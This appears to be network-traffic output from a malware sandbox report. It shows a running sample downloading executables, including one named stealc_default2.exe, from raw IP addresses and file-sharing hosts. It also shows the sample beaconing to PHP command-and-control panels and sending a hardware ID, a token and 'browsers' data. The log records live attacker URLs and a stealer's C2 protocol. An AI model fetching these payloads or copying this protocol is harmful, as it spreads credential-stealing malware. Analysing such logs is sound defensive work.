Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:52 GMTContent-Type: application/octet-streamContent-Length: 514560Last-Modified: Sun, 01 Sep 2024 13:24:10 GMTConnection: keep-aliveETag: "66d46afa-7da00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d1 07 00 00 20 00 00 00 d2 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 02 00 00 00 00 08 00 00 04 00 00 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f1 07 00 00 00 00 00 48 00 00 00 02 00 05 00 08 a9 07 00 e4 47 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c3 00 00 a8 a3 5e e3 e3 99 92 59 12 51 d7 3d c8 28 b6 ae ea e5 73 8b fb e0 32 07 15 24 17 1b e3 28 7c 15 63 46 4f 48 3a 3c d1 97 95 69 19 76 1b 24 de 1e 3a a7 53 a1 82 28 82 c0 4f 74 21 c7 22 da 4f 6c ff 91 af b7 2c a5 5e ea 6c 85 7f 81 b6 d8 08 0f bf 9a bd 77 67 64 f9 d3 1e bd 0b 53 55 4a 4a 29 02 bb 8e 0e b7 ba e3 a2 af 00 80 1c af 77 f4 49 76 56 8f ec 88 be 79 b5 c7 0e 5e 57 c3 78 27 66 a9 00 00 00 00 00 00 00 da 93 b3 08 30 48 67 b6 95 56 7b 66 0b ff 93 55 41 58 82 f2 6f 83 a6 a1 4f a7 09 db 14 fa bf 52 29 b8 82 d6 b3 b8 b0 96 41 54 fd e9 5d 4c 97 da 25 63 4a 02 bd 02 76 fa 39 ed 7d 23 2d 56 b0 10 1f d6 25 7e 47 b5 4e 27 99 f0 49 09 e8 35 76 b0 3b 49 49 e0 c2 89 29 8e 48 c5 71 5a a7 fc 03 3c 98 2b 28 7c 4d 09 15 84 ee 10 d8 92 bf 7b 83 84 b2 33 0b f8 be 55 1a c7 bf 61 05 ee fa 74 55 a0 bd 00 00 00 00 00 00 00 01 00 00 00 05 05 00 00 00 02 03 00 00 00 01 01 00 00 00 01 00 00 00 03 03 00 00 00 02 03 00 00 00 04 04 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 03 Sep 2024 09:40:49 GMTETag: "65573c-62133da497946"Accept-Ranges: bytesContent-Length: 6641468Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 00 9f d6 66 00 14 5f 00 9b 25 00 00 e0 00 06 01 0b 01 02 23 00 d6 47 00 00 66 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 f0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 c6 00 00 06 00 00 31 99 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 b3 00 42 00 00 00 00 50 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b3 00 20 2c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 9a 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 51 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 d5 47 00 00 10 00 00 00 d6 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 08 18 00 00 00 f0 47 00 00 1a 00 00 00 dc 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 f8 9c 00 00 00 10 48 00 00 9e 00 00 00 f6 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 f4 99 03 00 00 b0 48 00 00 9a 03 00 00 94 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 40 b3 00 00 02 00 00 00 2e 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 50 b3 00 00 0a 00 00 00 30 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 60 b3 00 00 02 00 00 00 3a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 b3 00 00 02 00 00 00 3c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 20 2c 0e 00 00 80 b3 00 00 2e 0e 00 00 3e 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 b0 c1 00 00 08 00 00 00 6c 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 c0 c1 00 00 a8 01 00 00 74 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 70 c3 00 00 4e 00 00 00 1c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:14:04 GMTContent-Type: application/octet-streamContent-Length: 514560Last-Modified: Sun, 01 Sep 2024 13:24:10 GMTConnection: keep-aliveETag: "66d46afa-7da00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d1 07 00 00 20 00 00 00 d2 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 02 00 00 00 00 08 00 00 04 00 00 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f1 07 00 00 00 00 00 48 00 00 00 02 00 05 00 08 a9 07 00 e4 47 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c3 00 00 a8 a3 5e e3 e3 99 92 59 12 51 d7 3d c8 28 b6 ae ea e5 73 8b fb e0 32 07 15 24 17 1b e3 28 7c 15 63 46 4f 48 3a 3c d1 97 95 69 19 76 1b 24 de 1e 3a a7 53 a1 82 28 82 c0 4f 74 21 c7 22 da 4f 6c ff 91 af b7 2c a5 5e ea 6c 85 7f 81 b6 d8 08 0f bf 9a bd 77 67 64 f9 d3 1e bd 0b 53 55 4a 4a 29 02 bb 8e 0e b7 ba e3 a2 af 00 80 1c af 77 f4 49 76 56 8f ec 88 be 79 b5 c7 0e 5e 57 c3 78 27 66 a9 00 00 00 00 00 00 00 da 93 b3 08 30 48 67 b6 95 56 7b 66 0b ff 93 55 41 58 82 f2 6f 83 a6 a1 4f a7 09 db 14 fa bf 52 29 b8 82 d6 b3 b8 b0 96 41 54 fd e9 5d 4c 97 da 25 63 4a 02 bd 02 76 fa 39 ed 7d 23 2d 56 b0 10 1f d6 25 7e 47 b5 4e 27 99 f0 49 09 e8 35 76 b0 3b 49 49 e0 c2 89 29 8e 48 c5 71 5a a7 fc 03 3c 98 2b 28 7c 4d 09 15 84 ee 10 d8 92 bf 7b 83 84 b2 33 0b f8 be 55 1a c7 bf 61 05 ee fa 74 55 a0 bd 00 00 00 00 00 00 00 01 00 00 00 05 05 00 00 00 02 03 00 00 00 01 01 00 00 00 01 00 00 00 03 03 00 00 00 02 03 00 00 00 04 04 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:14:11 GMTContent-Type: application/octet-streamContent-Length: 514560Last-Modified: Sun, 01 Sep 2024 13:24:10 GMTConnection: keep-aliveETag: "66d46afa-7da00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d1 07 00 00 20 00 00 00 d2 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 02 00 00 00 00 08 00 00 04 00 00 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f1 07 00 00 00 00 00 48 00 00 00 02 00 05 00 08 a9 07 00 e4 47 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c3 00 00 a8 a3 5e e3 e3 99 92 59 12 51 d7 3d c8 28 b6 ae ea e5 73 8b fb e0 32 07 15 24 17 1b e3 28 7c 15 63 46 4f 48 3a 3c d1 97 95 69 19 76 1b 24 de 1e 3a a7 53 a1 82 28 82 c0 4f 74 21 c7 22 da 4f 6c ff 91 af b7 2c a5 5e ea 6c 85 7f 81 b6 d8 08 0f bf 9a bd 77 67 64 f9 d3 1e bd 0b 53 55 4a 4a 29 02 bb 8e 0e b7 ba e3 a2 af 00 80 1c af 77 f4 49 76 56 8f ec 88 be 79 b5 c7 0e 5e 57 c3 78 27 66 a9 00 00 00 00 00 00 00 da 93 b3 08 30 48 67 b6 95 56 7b 66 0b ff 93 55 41 58 82 f2 6f 83 a6 a1 4f a7 09 db 14 fa bf 52 29 b8 82 d6 b3 b8 b0 96 41 54 fd e9 5d 4c 97 da 25 63 4a 02 bd 02 76 fa 39 ed 7d 23 2d 56 b0 10 1f d6 25 7e 47 b5 4e 27 99 f0 49 09 e8 35 76 b0 3b 49 49 e0 c2 89 29 8e 48 c5 71 5a a7 fc 03 3c 98 2b 28 7c 4d 09 15 84 ee 10 d8 92 bf 7b 83 84 b2 33 0b f8 be 55 1a c7 bf 61 05 ee fa 74 55 a0 bd 00 00 00 00 00 00 00 01 00 00 00 05 05 00 00 00 02 03 00 00 00 01 01 00 00 00 01 00 00 00 03 03 00 00 00 02 03 00 00 00 04 04 00 0

Source: global traffic	HTTP traffic detected: GET /get/5dfLDESaxz/crypted.exe HTTP/1.1Host: transfer.adminforge.de
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/crypteda.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.17Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 38 33 35 42 36 46 32 35 37 34 35 32 35 33 37 30 33 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"75835B6F2574525370364------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"default2------GDHIEHJEBAAFIDHJEBGI--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /3846636/Set-up.exe?hash=AgADDB HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"browsers------CFHDHIJDGCBAKFIEGHCB--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="message"plugins------HIJEGIIJDGHDGCBGHCAA--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
